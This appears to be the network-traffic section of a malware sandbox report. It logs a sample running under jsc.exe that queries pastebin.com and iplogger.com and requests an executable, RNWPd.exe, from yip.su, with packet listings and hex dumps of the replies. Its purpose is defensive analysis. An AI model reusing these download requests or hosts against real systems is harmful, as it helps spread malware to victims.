                                    Aug 18, 2024 00:11:40.990195036 CEST49802443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:40.996018887 CEST44349802188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:40.996097088 CEST44349802188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:40.996157885 CEST49802443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:40.996175051 CEST44349802188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:41.057528019 CEST49802443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:41.076086044 CEST44349802188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:41.076229095 CEST44349802188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:41.076287031 CEST49802443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:41.076848030 CEST49802443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:45.511972904 CEST49803443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:45.512015104 CEST44349803104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:45.512098074 CEST49803443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:45.513526917 CEST49804443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:45.513612032 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:45.513693094 CEST49804443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:45.513988972 CEST49804443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:45.514018059 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:45.982925892 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:45.989094019 CEST49804443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:45.989145994 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:46.101453066 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:46.101807117 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:46.101898909 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:46.101954937 CEST49804443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:46.101985931 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:46.102111101 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:46.102154970 CEST49804443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:46.102169037 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:46.102271080 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:46.102303982 CEST49804443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:46.102315903 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:46.102451086 CEST49804443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:46.102463961 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:46.106125116 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:46.106210947 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:46.106350899 CEST49804443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:46.106364965 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:46.106549025 CEST49804443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:46.189624071 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:46.189939022 CEST44349804188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:46.190103054 CEST49804443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:46.193082094 CEST49804443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:50.636538982 CEST49805443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:50.636585951 CEST44349805104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:50.636769056 CEST49805443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:50.637058020 CEST49805443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:50.637068987 CEST44349805104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:51.099455118 CEST44349805104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:51.101761103 CEST49805443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:51.101788044 CEST44349805104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:51.223378897 CEST44349805104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:51.223501921 CEST44349805104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:51.223551989 CEST49805443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:51.223558903 CEST44349805104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:51.223709106 CEST44349805104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:51.223757982 CEST49805443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:51.223762989 CEST44349805104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:51.223942995 CEST44349805104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:51.223998070 CEST49805443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:51.224342108 CEST49805443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:51.247602940 CEST49803443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:51.262114048 CEST49806443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:51.262135983 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:51.262198925 CEST49806443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:51.262496948 CEST49806443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:51.262507915 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:51.932820082 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:51.934328079 CEST49806443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:51.934353113 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:52.058043957 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:52.058317900 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:52.058413982 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:52.058449030 CEST49806443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:52.058464050 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:52.058572054 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:52.058587074 CEST49806443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:52.058593035 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:52.058687925 CEST49806443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:52.058693886 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:52.059648037 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:52.059748888 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:52.060012102 CEST49806443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:52.060018063 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:52.060390949 CEST49806443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:52.064368010 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:52.148890972 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:52.149014950 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:52.149023056 CEST49806443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:52.149044037 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:52.149270058 CEST44349806188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:52.149286032 CEST49806443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:52.149382114 CEST49806443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:52.149843931 CEST49806443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:56.401751041 CEST49807443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:56.401784897 CEST44349807104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:56.401926994 CEST49807443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:56.402451992 CEST49807443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:56.402457952 CEST44349807104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:56.890440941 CEST44349807104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:56.894462109 CEST49807443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:56.894478083 CEST44349807104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:57.025922060 CEST44349807104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:57.025976896 CEST44349807104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:57.026011944 CEST44349807104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:57.026030064 CEST49807443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:57.026038885 CEST44349807104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:57.026072025 CEST49807443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:57.026078939 CEST44349807104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:57.026163101 CEST44349807104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:11:57.026205063 CEST49807443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:57.026783943 CEST49807443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:11:57.048669100 CEST49808443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:57.048729897 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.048809052 CEST49808443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:57.049114943 CEST49808443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:57.049133062 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.507709026 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.509268045 CEST49808443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:57.509310961 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.647042990 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.647156954 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.647208929 CEST49808443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:57.647218943 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.647242069 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.647289038 CEST49808443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:57.647314072 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.647377014 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.647418022 CEST49808443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:57.647425890 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.648169994 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.648202896 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.648217916 CEST49808443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:57.648226023 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.648266077 CEST49808443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:57.648272038 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.733897924 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.733951092 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.734030008 CEST49808443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:57.734062910 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.734086037 CEST44349808188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:11:57.734108925 CEST49808443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:57.734137058 CEST49808443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:11:57.734472036 CEST49808443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:12:02.543839931 CEST49809443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:12:02.543894053 CEST44349809104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:12:02.545175076 CEST49809443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:12:02.545476913 CEST49809443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:12:02.545491934 CEST44349809104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:12:03.011790991 CEST44349809104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:12:03.015511990 CEST49809443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:12:03.015537024 CEST44349809104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:12:03.128973961 CEST44349809104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:12:03.129046917 CEST44349809104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:12:03.129086018 CEST44349809104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:12:03.129110098 CEST49809443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:12:03.129127979 CEST44349809104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:12:03.129137993 CEST44349809104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:12:03.129172087 CEST49809443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:12:03.129184008 CEST44349809104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:12:03.129221916 CEST49809443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:12:03.129231930 CEST44349809104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:12:03.129257917 CEST44349809104.20.4.235192.168.2.5
                                    Aug 18, 2024 00:12:03.129312992 CEST49809443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:12:03.129769087 CEST49809443192.168.2.5104.20.4.235
                                    Aug 18, 2024 00:12:03.216056108 CEST49810443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:12:03.216103077 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.216183901 CEST49810443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:12:03.216419935 CEST49810443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:12:03.216428995 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.696696043 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.698450089 CEST49810443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:12:03.698461056 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.822035074 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.822262049 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.822362900 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.822410107 CEST49810443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:12:03.822433949 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.822556973 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.822613955 CEST49810443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:12:03.822628975 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.822676897 CEST49810443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:12:03.822747946 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.822912931 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.822998047 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.823060989 CEST49810443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:12:03.823075056 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.823127985 CEST49810443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:12:03.828577995 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.885781050 CEST49810443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:12:03.885817051 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.912797928 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.913038015 CEST44349810188.114.96.3192.168.2.5
                                    Aug 18, 2024 00:12:03.913206100 CEST49810443192.168.2.5188.114.96.3
                                    Aug 18, 2024 00:12:03.914105892 CEST49810443192.168.2.5188.114.96.3
                                    TimestampSource PortDest PortSource IPDest IP
                                    Aug 18, 2024 00:08:04.036092043 CEST6063653192.168.2.51.1.1.1
                                    Aug 18, 2024 00:08:04.043519974 CEST53606361.1.1.1192.168.2.5
                                    Aug 18, 2024 00:08:05.425964117 CEST6306553192.168.2.51.1.1.1
                                    Aug 18, 2024 00:08:05.435465097 CEST53630651.1.1.1192.168.2.5
                                    Aug 18, 2024 00:10:05.449057102 CEST6058353192.168.2.51.1.1.1
                                    Aug 18, 2024 00:10:05.457748890 CEST53605831.1.1.1192.168.2.5
                                    Aug 18, 2024 00:11:21.762048006 CEST5252053192.168.2.51.1.1.1
                                    Aug 18, 2024 00:11:21.769450903 CEST53525201.1.1.1192.168.2.5
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Aug 18, 2024 00:08:04.036092043 CEST192.168.2.51.1.1.10x2051Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                    Aug 18, 2024 00:08:05.425964117 CEST192.168.2.51.1.1.10x492Standard query (0)yip.suA (IP address)IN (0x0001)false
                                    Aug 18, 2024 00:10:05.449057102 CEST192.168.2.51.1.1.10xb009Standard query (0)iplogger.comA (IP address)IN (0x0001)false
                                    Aug 18, 2024 00:11:21.762048006 CEST192.168.2.51.1.1.10x706cStandard query (0)iplogger.comA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Aug 18, 2024 00:08:04.043519974 CEST1.1.1.1192.168.2.50x2051No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                    Aug 18, 2024 00:08:04.043519974 CEST1.1.1.1192.168.2.50x2051No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                    Aug 18, 2024 00:08:04.043519974 CEST1.1.1.1192.168.2.50x2051No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                    Aug 18, 2024 00:08:05.435465097 CEST1.1.1.1192.168.2.50x492No error (0)yip.su188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 18, 2024 00:08:05.435465097 CEST1.1.1.1192.168.2.50x492No error (0)yip.su188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 18, 2024 00:10:05.457748890 CEST1.1.1.1192.168.2.50xb009No error (0)iplogger.com104.21.76.57A (IP address)IN (0x0001)false
                                    Aug 18, 2024 00:10:05.457748890 CEST1.1.1.1192.168.2.50xb009No error (0)iplogger.com172.67.188.178A (IP address)IN (0x0001)false
                                    Aug 18, 2024 00:11:21.769450903 CEST1.1.1.1192.168.2.50x706cNo error (0)iplogger.com172.67.188.178A (IP address)IN (0x0001)false
                                    Aug 18, 2024 00:11:21.769450903 CEST1.1.1.1192.168.2.50x706cNo error (0)iplogger.com104.21.76.57A (IP address)IN (0x0001)false
                                    • pastebin.com
                                    • yip.su
                                    • iplogger.com
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.549706104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:04 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:04 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:08:04 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfb0dda630c90-EWR
                                    2024-08-17 22:08:04 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:08:04 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:08:04 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:08:04 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:08:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.549707188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:05 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:06 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:08:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
